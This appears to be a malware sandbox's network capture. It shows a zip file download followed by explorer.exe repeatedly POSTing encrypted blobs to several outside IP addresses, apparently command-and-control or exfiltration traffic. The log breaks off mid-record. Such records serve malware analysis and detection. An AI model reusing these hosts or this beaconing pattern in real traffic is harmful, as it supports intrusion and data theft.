2024-07-27 05:30:48 UTC	577	IN	HTTP/1.1 200 OK Server: nginx/1.27.0 Date: Sat, 27 Jul 2024 05:30:48 GMT Content-Type: application/zip Content-Length: 528925 Connection: close Accept-Ranges: bytes Access-Control-Allow-Headers: Accept, Accept-Language, Content-Language, Content-Type, Content-Length, Range, Authorization Access-Control-Allow-Methods: POST, GET, OPTIONS, PUT, DELETE Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Cache-Control, Content-Encoding, Content-Range Content-Disposition: attachment; filename*=UTF-8''lm.zip Last-Modified: Sat, 20 Jul 2024 15:36:00 GMT
2024-07-27 05:30:48 UTC	512	IN	Data Raw: 50 4b 03 04 14 00 00 00 08 00 15 7b f3 58 c4 92 38 a6 85 28 05 00 fb 29 05 00 08 00 00 00 64 61 74 61 2e 62 69 6e 00 1f 2c e0 d3 60 9c e8 00 00 00 00 5e b9 dc 29 05 00 b2 c8 30 94 0e 17 00 00 00 02 94 0e 17 00 00 00 e2 f0 92 75 77 e0 85 72 c2 bd 55 09 ce ca ca 84 3b 3f 3f 0e c2 8b 6b 30 14 f1 48 5f 7b 5a 41 91 0d 98 6b bd 94 61 e5 1b 0f c7 0d e8 65 1b 1e 86 14 20 20 20 20 20 de 75 6a 5f b1 2f fb 26 7b 45 0a be 05 ce 79 a3 39 b7 9a 41 a5 20 83 99 3c e6 22 4c 5c 50 75 cc ac e5 bf bb 2b 64 04 96 20 44 f6 f2 9e fe a4 c7 03 8b c5 fc 9a db 81 f9 b6 56 87 3e 30 c0 10 f4 29 a7 48 41 3b 11 24 9d e8 5a 82 2f 28 ea db 56 e9 10 b5 2d be c2 89 6f 5a b4 5b 18 da 65 94 95 19 65 cb 0e 2a 07 ab d8 36 9d 69 45 5b bd d9 93 47 b7 30 36 34 d4 e2 c4 5e 50 b0 df 6a 5e a1 fd 2a Data Ascii: PK{X8()data.bin,`^)0uwrU;??k0H_{ZAkae uj_/&{Ey9A <"L\Pu+d DV>0)HA;$Z/(V-oZ[ee6iE[G064^Pj^
2024-07-27 05:30:48 UTC	4096	IN	Data Raw: 27 7d 90 93 89 da 18 99 b1 94 27 99 fd a0 93 e7 48 02 6b 2d bf a3 8c cf 47 1d 47 18 b1 7d d1 23 48 8c 6f 8f 14 00 b5 e3 85 16 01 43 9f ef 87 c1 f8 68 45 38 ef 5c 98 95 fd 4e 04 cc e7 73 c6 fe a3 87 fb 83 4e 0e 0e 5e 87 7c 3a 7b fc f9 c6 40 d8 2e d9 11 c1 98 1e c0 6c 01 91 60 e7 7b 11 43 ce 3f b8 b4 aa 26 76 18 4e 79 ac 1a 34 88 25 f7 a1 16 f3 5c 88 f8 d1 c8 c3 19 7f 9b 71 cb f2 f2 f2 f2 f2 f2 f2 f2 f0 f1 f1 f1 ed ee ee ee ee ee ee ee ec 99 58 af a5 d8 11 da 20 4f e9 7e 4b 0f 70 94 c2 78 d6 ba de 37 19 00 6d 11 92 09 11 8d 01 47 a5 36 46 65 a2 bf 75 a7 f3 1d 24 c7 73 1a 5b dd fb ff 13 f5 3b d7 71 8e 98 2a cc ac 29 7c 76 26 e1 ea 12 0c 30 3a 30 8f 15 4d 3a a3 21 ff 92 36 82 b3 00 37 e1 ab 75 bb d9 ed d8 8f f9 21 c4 33 14 d9 8d ae 44 8e 10 09 58 e8 1d a1 b5 Data Ascii: '}'Hk-GG}#HoChE8\NsN^\|:{@.l`{C?&vNy4%\qX O~Kpx7mG6Feu$s[;q*)\|v&0:0M:!67u!3DX
2024-07-27 05:30:48 UTC	4096	IN	Data Raw: af 24 7f ff a8 11 2f 31 d0 dd 50 69 a0 b2 c6 b1 ed 2e ae a6 dd b7 c5 cf 9c 12 39 04 10 4c d5 e5 3a 1d eb fb 06 97 dc 93 15 25 25 62 81 da 82 5a 94 70 f6 94 67 ed 55 5c 3a 9b 40 dc 02 ce c0 22 2a 1f a4 47 f6 56 d3 c0 8f f2 9c 4f b6 f8 94 f5 31 a0 d4 85 3e 8a 20 95 35 69 c6 8f ad 42 5e 48 56 41 db 31 da d4 55 49 bb cb fb b6 d6 3f 1a f2 c3 32 46 15 ad bd 66 51 51 10 1e 41 2e f0 ac ac 53 b9 5e c4 17 fd 47 5e a6 5e c5 68 36 74 62 20 f9 f2 25 b4 01 58 94 71 98 14 86 ad ef 40 84 6a ca 90 2b 3d 86 9b 44 37 ee b0 84 6a dc 84 c0 51 8d d3 61 f8 ff 92 d1 c0 9b 95 36 cf ef 2b 19 05 80 ee 3f d7 a5 27 c9 e8 6b a5 8e de c5 39 89 c1 41 be 2f bd 19 5d 7f 8d 27 76 c6 ab b7 aa e4 9f 05 f5 d8 b4 cd e0 d1 b3 2b 7b 0c c7 e5 f2 4d d8 f6 f9 54 bd 4a f5 e3 0a 21 5a e9 76 4a c6 19 Data Ascii: $/1Pi.9L:%%bZpgU\:@"*GVO1> 5iB^HVA1UI?2FfQQA.S^G^^h6tb %Xq@j+=D7jQa6+?'k9A/]'v+{MTJ!ZvJ
2024-07-27 05:30:48 UTC	4096	IN	Data Raw: dd b2 3e 61 5e 59 f4 fe a7 cb 64 4f af 06 49 5b 21 dd d2 12 6b b1 b0 74 54 58 ea f5 57 7f a7 e9 95 6f 72 39 4a 59 b1 da 34 09 19 46 8a 36 b1 ca 31 5f 02 91 31 6f ee c6 98 2f e4 4e d1 63 a7 74 ef d0 a0 8a 24 dd a7 63 9c 7e d9 1e 22 89 03 84 74 b4 81 be 0a 14 81 d1 b6 b6 fc e3 2e cc ea 56 08 c2 ca 9a 0d 9e 5c a8 af e7 02 d2 39 cb 4e e8 24 58 3a c8 4a b7 81 9b 1d a3 ab f5 71 20 cc df d9 65 a6 6e d7 63 ce bd a4 48 3b 9a 8c 9a 1a 8c cf 4b 6a e2 2e e6 a5 ac d1 38 9e 37 02 18 9c 45 6e 16 a5 48 34 00 2f 2c 7f 18 6f 60 61 c3 63 e5 a1 de 7f 09 36 81 38 41 c2 d4 5b 83 07 64 cb a2 cf bc c0 16 e5 04 f9 86 d6 95 ee 1f 37 1e 18 c8 6b 50 98 ce 9c 7d a0 92 4b 16 50 df 88 0e 68 10 93 3b 8c 17 4b 6b f4 1d 47 19 0f ad 68 78 70 ef da 81 5c 50 75 e1 85 70 af 04 07 b6 1f fc e4 Data Ascii: >a^YdOI[!ktTXWor9JY4F61_1o/Nct$c~"t.V\9N$X:Jq encH;Kj.87EnH4/,o`ac68A[d7kP}KPh;KkGhxp\Pup
2024-07-27 05:30:48 UTC	4096	IN	Data Raw: 00 17 06 b8 0c 9c 9c f8 87 f3 40 ca be 10 75 b5 55 5d 7e 13 de 84 67 8b e8 af 39 c0 22 80 2c 4c eb 09 fa 21 a0 62 54 d7 30 fd 53 f8 21 92 70 71 91 2a 79 43 5b e3 5c 65 ef a8 6e aa 92 76 c1 e1 6b c1 13 76 cc 1f ca 04 ab 1c c6 2c 57 2c b6 df 66 b2 68 b5 6c 8b 54 00 1c 22 7c 26 10 e0 7e 05 de 50 88 cf 4b 7e 5e 9d 6a f1 f0 2e 9c 66 ca 74 51 87 cc 70 0b a7 7a 2c ef 04 d0 7c b8 bc 81 9b 37 f7 75 09 58 a7 e3 e3 80 16 6f 25 3a 84 19 15 18 d8 5f 29 86 a5 66 40 f2 d3 40 0b ed 8d 87 ba cf fb 3a 31 8b 4a dd d9 15 34 f7 8e 8d b0 02 37 0d d9 6e cc d0 aa 51 cc f9 7f 6d 53 a1 4a f6 c8 78 e8 3d d0 a9 62 8b 1c 1b 6c 90 ff 61 b0 56 07 6e e9 bb 2c cf 05 30 00 9a 4f 51 b0 bb ac 2e 3a 3d d4 a3 00 c6 ed 0d 65 a9 c3 a6 56 65 cb c9 07 de 2c 36 da a4 87 c7 d6 1b 73 3a 88 17 5c ab Data Ascii: @uU]~g9",L!bT0S!pq*yC[\envkv,W,fhlT"\|&~PK~^j.ftQpz,\|7uXo%:_)f@@:1J47nQmSJx=blaVn,0OQ.:=eVe,6s:\
2024-07-27 05:30:48 UTC	4096	IN	Data Raw: ee cf 5a 9d 22 b8 98 cd a0 f8 78 46 c4 71 0d d5 e5 08 fd f8 3d bf 4c 7f c1 fe e2 f6 7e 36 6e 1f 5b db f4 b7 0a 85 37 67 fd 8c 70 e0 a7 7f 86 c9 7b be 31 50 e7 9e 6b e0 73 3e 94 09 9d 14 54 39 20 28 6d 03 b6 a3 d3 94 89 52 dc de b4 5a c9 e8 1b f2 96 f4 f0 b0 7d d5 91 e2 34 0e c7 05 3b ea ff e7 08 81 81 82 bd d6 5f d3 4f a1 97 b2 55 ea 70 9c bb 11 15 23 ae b8 83 6f 06 ee 54 9c 27 95 21 94 a5 14 13 f3 29 cf c8 e5 ee 5d 76 dc 9d 06 7a da ff 0f 51 97 e0 e1 a0 0b ef cc 4c f5 1b a4 83 c5 60 48 d5 dc 82 1b 32 5c 3d 5a 03 df 69 a7 94 ad cd b0 0a c9 3a 1c da 87 e0 02 e3 64 88 b2 fb c3 ce c2 21 65 67 ee a2 d3 d2 be 87 5c 47 21 db b8 53 8c 29 9d 5b 62 95 19 26 f2 9d 64 25 bb 00 3c ff 4b c8 01 dd c8 8c a9 b4 47 87 cf 7b b2 b2 04 a1 49 d6 91 87 63 f2 bd 19 99 23 a1 52 Data Ascii: Z"xFq=L~6n[7gp{1Pks>T9 (mRZ}4;_OUp#oT'!)]vzQL`H2\=Zi:d!eg\G!S)[b&d%<KG{Ic#R
2024-07-27 05:30:48 UTC	4096	IN	Data Raw: 9b 09 13 39 5c 5c 64 9f ab f1 3f b6 09 8a 2d bc 4d 0f 4a 6f 9f 88 dd d8 95 aa 8c cc e4 76 8c 81 9d de 39 42 71 ee cd c5 58 cb b0 3c 57 13 8c 89 5a e8 2e 60 17 bc d0 7a 76 4b a5 79 72 cc 16 98 fe fd f1 f2 a3 36 95 dd e8 5d 4b 60 d4 37 b4 bf 2f 1e c3 03 56 cf 5a 82 de d5 66 25 36 5a a2 14 37 a5 36 b4 cb 40 3c 7c 76 c5 a2 87 71 ba 19 73 90 56 0b a5 04 51 d4 aa e0 68 f0 fb 3f 10 a3 ad 97 3a 16 ec 6a 97 a7 e3 83 a3 b9 4a 75 d7 28 b0 07 ee 02 c9 a1 86 65 3e 0b fc df 38 ca 60 05 2e bd 36 c8 b7 bc 06 74 e9 91 cf 50 2f c6 d8 dc 29 f0 43 57 34 ad 01 cb 85 af a6 0a 1e 74 d2 5f 41 70 f1 c8 64 ba f5 73 77 7e c6 ee b3 b9 9e 31 13 67 51 c4 8d 93 cf f9 33 64 bb 53 ea df 91 c1 20 c8 cb e8 75 ea 85 3b 7e 3a 4a 13 52 8e ba a7 da 83 e0 2b 7e 14 43 46 2c d0 ff 53 3c f0 c2 08 Data Ascii: 9\\d?-MJov9BqX<WZ.`zvKyr6]K`7/VZf%6Z76@<\|vqsVQh?:jJu(e>8`.6tP/)CW4t_Apdsw~1gQ3dS u;~:JR+~CF,S<
2024-07-27 05:30:48 UTC	4096	IN	Data Raw: 35 b9 3d ae e8 36 9e 93 e1 f3 a5 4d 25 b8 bc 10 7d bc da a6 8e cf e2 62 c4 0a f4 79 8a 7b 51 7d ed eb f2 55 1c b1 f3 76 9e 53 a7 e8 e0 11 ac 13 e5 d5 36 8d 68 f2 bf 40 59 40 cd 4a 8e 99 f1 88 bb dc e9 f2 85 c0 b6 da da 16 e9 d8 31 08 d4 60 b8 95 27 1d 6d cb d6 09 9d 7d 6a 22 db 89 6d 03 1b e8 b2 16 e8 98 2c 87 c0 49 9d e5 46 55 11 c1 c1 b0 38 ab 79 86 66 3d a5 db 6d 9c f9 b9 87 77 b6 a3 45 7b 5d cb b8 0c 53 11 a5 ba d0 6a a1 65 25 e5 31 e1 1c b5 52 55 5a 2b 0a da db d2 72 e1 6e 5b 74 a1 9b 77 1d da 35 e7 57 8e 16 36 55 b0 7d 7b 4d fc d4 5f fe 6c db 28 d8 b0 d0 7b d3 0a 24 6a c0 9d 72 21 c4 a0 bb e2 41 50 4a b6 0e e0 db a4 fc 94 2a 27 9f fd 62 72 6b 75 b8 54 bb eb 0e b4 ab a9 b6 aa 42 8a 50 77 c5 a2 fc 9a 38 89 99 68 9a e8 b0 23 f9 ad c2 a9 41 50 81 e4 e5 Data Ascii: 5=6M%}by{Q}UvS6h@Y@J1`'m}j"m,IFU8yf=mwE{]Sje%1RUZ+rn[tw5W6U}{M_l({$jr!APJ*'brkuTBPw8h#AP
2024-07-27 05:30:48 UTC	4096	IN	Data Raw: b5 f0 9a a4 71 b4 47 db 05 8d 76 04 b0 1e 89 34 33 9d 71 eb 4d 47 10 37 d1 11 81 44 b3 39 28 51 70 a5 44 0e 0a 37 5a d7 44 78 03 61 1a 21 0b fb 62 85 64 24 f3 1c 64 93 c2 67 2a 48 a4 18 ef e9 f8 f1 5a 41 11 d3 4d 71 4f f8 3c 89 45 bb 37 6b d5 d3 c1 f8 09 0a db 78 17 8b e8 10 f2 4d c6 fb 97 29 a7 6f 33 d2 d2 8d a9 45 d9 72 fe 52 7b 70 eb 2c e9 fb a6 d9 f7 2d 7c 5d a3 94 fd 14 5f 42 a7 31 f1 52 e5 db d4 35 8f 01 39 8a 11 ef 18 9e 0c a7 ab e0 ca 83 62 8a 6a 7b 60 d1 dd 11 b9 4e ee 2b e8 79 72 41 e4 de 95 4c 52 84 0f 5e 77 74 d2 f0 58 5e 39 20 b3 55 7e f1 4b c3 04 ef f8 8f 09 e0 40 31 08 0f 59 f9 df ed 51 83 59 78 48 0c 2e 40 e7 60 eb 97 5f c9 c4 c6 d9 46 c3 6d 1f 50 2f 93 f9 72 7d 42 57 96 1b c0 ea 41 85 c9 f3 36 2a 7e 79 bb e1 19 22 92 47 86 81 ce a6 fa 63 Data Ascii: qGv43qMG7D9(QpD7ZDxa!bd$dgHZAMqO<E7kxM)o3ErR{p,-\|]_B1R59bj{`N+yrALR^wtX^9 U~K@1YQYxH.@`_FmP/r}BWA6~y"Gc
2024-07-27 05:30:48 UTC	4096	IN	Data Raw: 46 94 44 d4 1a bd 3d 25 28 41 89 70 53 b6 3c 25 25 87 79 91 ae c9 a4 55 0a 23 67 fa 87 63 75 7b 9d 41 56 7d 7f 0e 4e 89 bb be d7 da 36 be 6b c3 a1 06 8d f0 93 52 17 4d 10 c9 99 ea 02 e6 50 f9 e5 21 9e 7a ef 7b 14 85 df e2 43 42 e9 89 3e ce 49 11 a4 e9 1a 9b e0 63 7f cf 38 7b c0 30 0b 4d fc c8 36 a5 a1 f7 ef 19 2e 9b c0 9b d0 2a e1 a0 99 2a 24 92 2a 4b b8 b9 af b7 fe 77 cf e1 c2 cc 81 d8 2c 3a b0 ae 03 5d 77 b6 cb 0c f1 65 48 4b ba 80 14 71 91 ae d1 00 d0 b1 96 cb 3a a3 5f 8f 40 b8 5c 01 01 50 23 32 f9 af 96 a9 bb de 1a 18 32 4e 69 af 4a ea 2f 61 0f 18 82 76 e8 02 27 0f a1 33 99 cf e2 7a c7 72 82 55 fc 2d 8a 31 61 85 7c 4f 50 24 40 e5 8f 80 8f b9 e4 4c 85 3e 7f fc 3c df 03 e3 72 0e c4 81 8e b1 72 e3 f8 be 34 52 88 59 35 e9 d8 eb a0 0d 01 54 78 c8 02 bd 1c Data Ascii: FD=%(ApS<%%yU#gcu{AV}N6kRMP!z{CB>Ic8{0M6.*$Kw,:]weHKq:_@\P#22NiJ/av'3zrU-1a\|OP$@L><rr4RY5Tx

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.5	51851	107.173.160.139	443	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:30:48 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.139 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-27 05:30:48 UTC	1122	OUT	Data Raw: 6b 38 79 61 4d 57 67 47 79 58 64 56 6d 74 30 39 57 54 6a 36 6d 54 59 2b 31 72 71 56 31 4a 6d 53 49 50 69 2b 45 6b 55 46 79 63 47 46 39 6b 56 68 49 42 6e 36 4d 7a 4e 4b 2b 53 37 74 43 7a 4f 36 48 39 45 36 69 34 75 6d 4c 65 71 70 56 67 6b 57 77 74 35 34 6b 4c 46 4e 7a 4b 61 35 4f 76 35 47 59 41 5a 38 6c 55 6b 6d 55 2f 46 66 41 78 4f 76 52 4f 31 41 71 4f 70 36 58 37 72 6c 41 70 30 34 6c 38 39 41 67 64 38 62 53 74 72 45 68 63 62 74 63 43 6d 78 4a 52 58 35 53 49 67 4d 43 4f 36 43 51 6c 65 43 30 63 32 48 38 30 70 53 38 7a 78 75 33 46 6a 41 61 41 6f 4c 75 4b 42 7a 69 4f 62 50 73 46 79 51 62 58 33 46 33 2b 33 5a 44 6d 52 66 4a 46 41 45 77 6e 34 39 42 38 58 57 57 79 51 67 4c 72 30 4f 6b 4e 65 6f 6c 4f 49 32 34 65 4f 4e 52 4d 55 43 42 74 4e 57 54 32 6c 6f 76 61 5a Data Ascii: k8yaMWgGyXdVmt09WTj6mTY+1rqV1JmSIPi+EkUFycGF9kVhIBn6MzNK+S7tCzO6H9E6i4umLeqpVgkWwt54kLFNzKa5Ov5GYAZ8lUkmU/FfAxOvRO1AqOp6X7rlAp04l89Agd8bStrEhcbtcCmxJRX5SIgMCO6CQleC0c2H80pS8zxu3FjAaAoLuKBziObPsFyQbX3F3+3ZDmRfJFAEwn49B8XWWyQgLr0OkNeolOI24eONRMUCBtNWT2lovaZ
2024-07-27 05:30:50 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 05:30:50 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 05:30:50 UTC	685	IN	Data Raw: 46 30 70 6c 58 49 30 4e 46 48 71 73 52 55 32 45 79 47 6b 35 6d 50 6f 6f 4c 45 50 6f 75 67 37 69 52 30 71 75 6b 41 72 31 41 6a 64 66 4b 34 51 49 6d 37 65 48 52 4e 70 32 4d 46 42 57 61 6b 48 56 47 69 51 50 76 47 53 34 54 33 74 4a 65 4d 4f 70 71 2f 54 6b 67 6b 69 43 61 7a 42 50 70 6e 5a 6a 65 6c 77 30 67 39 77 35 64 67 71 63 4e 69 55 62 31 51 44 5a 42 6c 63 61 42 2f 61 54 65 71 4b 35 46 47 73 74 66 42 69 65 64 57 66 6f 39 63 63 65 34 73 71 41 64 50 37 73 5a 52 56 73 6d 54 75 70 59 39 49 62 37 62 48 4e 2f 37 42 33 6c 77 58 75 59 6b 44 5a 70 54 41 4c 43 54 6a 4d 5a 52 69 58 35 45 39 4b 31 77 6b 75 71 4c 76 38 34 31 67 69 44 4b 52 51 68 78 58 31 4a 63 48 66 52 66 66 49 56 63 76 77 46 54 34 74 65 79 66 31 44 51 61 54 2b 74 53 57 59 62 44 46 70 31 6f 77 69 59 4a Data Ascii: F0plXI0NFHqsRU2EyGk5mPooLEPoug7iR0qukAr1AjdfK4QIm7eHRNp2MFBWakHVGiQPvGS4T3tJeMOpq/TkgkiCazBPpnZjelw0g9w5dgqcNiUb1QDZBlcaB/aTeqK5FGstfBiedWfo9cce4sqAdP7sZRVsmTupY9Ib7bHN/7B3lwXuYkDZpTALCTjMZRiX5E9K1wkuqLv841giDKRQhxX1JcHfRffIVcvwFT4teyf1DQaT+tSWYbDFp1owiYJ

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.5	51853	167.235.128.153	443	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:30:51 UTC	234	OUT	POST / HTTP/1.1 Host: 167.235.128.153 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1267
2024-07-27 05:30:51 UTC	1267	OUT	Data Raw: 6d 6d 42 57 37 48 4a 43 41 51 6e 49 73 61 5a 37 48 47 75 61 51 49 41 77 51 43 30 42 54 2b 7a 64 6a 4b 56 50 72 6e 4b 49 62 64 4d 2b 4f 76 36 36 70 51 72 62 46 4a 38 55 58 63 70 7a 33 4f 34 70 63 6c 42 45 63 54 73 4e 74 51 66 43 63 6d 36 38 6e 64 47 4a 43 2b 7a 34 30 75 35 62 4d 70 46 32 6c 61 59 53 4f 66 68 37 54 78 33 39 35 6d 49 74 45 78 38 52 64 41 69 72 64 55 41 69 5a 50 48 6d 2b 53 32 76 70 32 4d 36 2b 77 43 33 5a 6b 6d 49 6d 6a 49 67 32 6f 36 4b 31 38 73 57 69 62 69 64 4a 39 65 33 4f 56 58 63 62 59 47 65 34 51 63 72 5a 48 4a 70 74 72 2f 61 70 69 73 49 4d 78 46 46 74 65 49 45 51 67 49 32 53 72 31 6a 34 66 54 61 61 62 66 34 6d 31 6b 6f 68 64 61 2b 45 71 55 46 66 34 7a 34 62 52 51 75 45 79 59 63 4b 65 39 5a 4b 45 6e 79 59 41 57 55 6e 39 50 30 49 31 62 Data Ascii: mmBW7HJCAQnIsaZ7HGuaQIAwQC0BT+zdjKVPrnKIbdM+Ov66pQrbFJ8UXcpz3O4pclBEcTsNtQfCcm68ndGJC+z40u5bMpF2laYSOfh7Tx395mItEx8RdAirdUAiZPHm+S2vp2M6+wC3ZkmImjIg2o6K18sWibidJ9e3OVXcbYGe4QcrZHJptr/apisIMxFFteIEQgI2Sr1j4fTaabf4m1kohda+EqUFf4z4bRQuEyYcKe9ZKEnyYAWUn9P0I1b
2024-07-27 05:30:52 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 05:30:51 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 05:30:52 UTC	685	IN	Data Raw: 42 5a 64 42 4c 67 4c 70 62 43 78 2b 46 4c 6f 62 69 4b 75 77 45 42 6f 59 76 76 36 70 62 66 6b 7a 61 37 59 4b 46 50 35 49 57 30 61 71 4d 42 36 2f 36 63 31 31 4a 4d 4a 36 42 68 50 4b 4e 67 77 30 4c 4e 79 76 61 31 46 6d 53 49 67 6a 72 6e 31 64 44 43 6e 48 50 68 65 57 6f 54 55 67 6c 76 7a 54 32 69 41 2f 30 56 5a 56 37 4a 68 74 68 4d 4a 47 79 37 48 6a 48 45 53 62 46 55 44 6f 30 41 72 46 66 4e 4f 4f 34 7a 73 54 36 46 46 5a 32 6c 6a 70 5a 36 62 77 49 37 6a 6e 78 75 45 5a 56 6e 56 4a 4c 53 2f 56 56 51 6b 4b 75 64 44 32 4b 54 47 77 66 38 64 75 76 53 51 54 57 61 47 54 6d 54 30 58 62 39 6b 68 52 61 53 43 50 30 4f 4f 39 64 6c 6d 44 68 72 4d 65 49 35 39 36 7a 61 39 30 48 4e 61 6d 68 61 6e 53 61 33 4f 6a 35 72 37 6a 35 4e 35 65 76 33 46 76 5a 55 6a 50 6b 72 62 37 6b 6e Data Ascii: BZdBLgLpbCx+FLobiKuwEBoYvv6pbfkza7YKFP5IW0aqMB6/6c11JMJ6BhPKNgw0LNyva1FmSIgjrn1dDCnHPheWoTUglvzT2iA/0VZV7JhthMJGy7HjHESbFUDo0ArFfNOO4zsT6FFZ2ljpZ6bwI7jnxuEZVnVJLS/VVQkKudD2KTGwf8duvSQTWaGTmT0Xb9khRaSCP0OO9dlmDhrMeI596za90HNamhanSa3Oj5r7j5N5ev3FvZUjPkrb7kn

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.5	51854	107.173.160.137	443	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:30:52 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.137 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1267
2024-07-27 05:30:52 UTC	1267	OUT	Data Raw: 6d 52 46 64 45 39 77 73 4c 48 49 36 64 74 5a 6a 51 31 63 6c 4d 2b 4a 57 35 4f 53 71 62 68 50 64 57 6e 36 6c 41 72 4c 77 54 5a 74 64 52 58 4d 79 46 6f 61 2f 67 78 6c 37 6e 76 74 75 6f 64 69 42 64 70 44 72 65 4c 6b 4d 4f 69 62 4c 74 41 53 32 4b 42 55 36 61 51 6d 4b 43 6d 67 76 6d 4b 44 4f 53 66 35 4a 33 4b 63 64 56 61 75 64 6c 58 78 36 65 32 58 71 50 64 70 67 62 71 78 52 78 50 78 42 42 4f 30 59 44 55 59 35 4f 32 78 46 75 53 67 44 4f 63 57 6c 52 75 4d 54 53 4e 32 57 71 52 76 54 42 45 70 4a 7a 57 56 34 4d 72 2b 51 46 49 58 2b 4b 78 54 56 52 74 36 64 48 70 46 35 6f 44 53 37 31 75 55 4c 38 6f 62 72 54 39 44 69 49 6e 63 68 4f 6c 64 7a 70 54 47 33 2b 34 73 54 57 79 46 6a 72 55 6f 69 6d 67 39 56 56 4f 62 74 50 45 33 47 79 6b 41 33 54 6d 6c 52 70 74 4e 78 68 59 34 Data Ascii: mRFdE9wsLHI6dtZjQ1clM+JW5OSqbhPdWn6lArLwTZtdRXMyFoa/gxl7nvtuodiBdpDreLkMOibLtAS2KBU6aQmKCmgvmKDOSf5J3KcdVaudlXx6e2XqPdpgbqxRxPxBBO0YDUY5O2xFuSgDOcWlRuMTSN2WqRvTBEpJzWV4Mr+QFIX+KxTVRt6dHpF5oDS71uUL8obrT9DiInchOldzpTG3+4sTWyFjrUoimg9VVObtPE3GykA3TmlRptNxhY4
2024-07-27 05:30:54 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 05:30:53 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 05:30:54 UTC	685	IN	Data Raw: 56 7a 31 37 79 55 77 57 33 39 6b 4d 6b 6d 59 52 56 70 68 63 72 75 4c 5a 4d 51 57 62 47 51 56 46 4d 68 7a 38 78 48 34 64 52 71 57 39 32 74 65 77 2b 70 55 66 65 49 49 31 73 6f 43 51 58 6e 65 55 46 30 6a 5a 48 54 4c 34 6b 6d 6a 5a 4b 49 32 73 58 46 2f 43 6c 5a 75 71 34 66 43 73 4d 39 71 4d 6d 77 61 52 5a 36 75 45 69 6d 62 71 68 4e 4d 64 4b 36 46 68 64 70 49 47 69 38 7a 6c 71 6f 42 54 43 68 33 30 7a 55 59 63 70 65 6e 37 74 78 69 4e 52 36 4a 55 4f 39 4d 49 68 6d 64 46 2f 30 6e 38 2b 34 75 67 57 75 58 31 63 50 66 41 33 43 33 30 34 4a 5a 77 41 55 4a 41 61 6b 30 35 73 73 54 79 50 55 62 72 4b 41 30 33 76 59 55 62 6e 43 41 6a 4b 69 31 53 2b 52 49 6b 6d 46 37 63 67 56 58 45 6b 64 59 56 46 54 7a 74 59 67 49 4d 65 72 30 75 6e 77 47 64 6c 57 4e 75 43 50 51 30 69 47 32 Data Ascii: Vz17yUwW39kMkmYRVphcruLZMQWbGQVFMhz8xH4dRqW92tew+pUfeII1soCQXneUF0jZHTL4kmjZKI2sXF/ClZuq4fCsM9qMmwaRZ6uEimbqhNMdK6FhdpIGi8zlqoBTCh30zUYcpen7txiNR6JUO9MIhmdF/0n8+4ugWuX1cPfA3C304JZwAUJAak05ssTyPUbrKA03vYUbnCAjKi1S+RIkmF7cgVXEkdYVFTztYgIMer0unwGdlWNuCPQ0iG2

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.5	51855	107.173.160.139	443	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:30:55 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.139 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1267
2024-07-27 05:30:55 UTC	1267	OUT	Data Raw: 57 4d 55 4d 57 4b 4a 55 38 66 34 6d 30 34 68 70 63 4a 4a 37 73 36 6a 6e 4c 35 31 47 6c 49 75 58 35 4a 58 30 66 76 73 44 47 72 49 48 4f 49 39 52 78 6d 6f 56 61 55 4a 50 73 69 4e 52 73 66 35 37 6e 4f 4a 59 58 51 72 59 62 6d 72 6e 39 78 6b 48 77 66 31 71 6a 6b 4e 30 6f 65 6f 6e 4f 42 4c 54 41 46 2b 31 61 63 4a 70 61 77 4f 45 67 38 30 6c 6f 56 6b 6f 2f 6c 73 6c 58 65 31 58 36 59 79 37 33 51 66 4b 47 68 6a 2b 77 72 72 32 66 4c 50 43 6f 78 56 35 69 69 56 4d 43 58 6b 47 70 4a 31 67 53 35 72 6d 52 73 71 50 66 66 35 62 63 2b 51 69 4e 66 75 6c 4b 30 56 50 56 6e 4d 35 6a 5a 4f 6c 55 6b 4e 36 4e 61 44 53 72 41 76 56 64 57 4d 67 33 73 76 30 52 38 6d 30 74 6f 79 78 4a 69 6c 53 4c 59 33 6c 6a 77 32 6d 6b 66 73 50 53 68 65 34 33 4a 76 50 71 61 58 57 51 47 66 44 44 6f 71 Data Ascii: 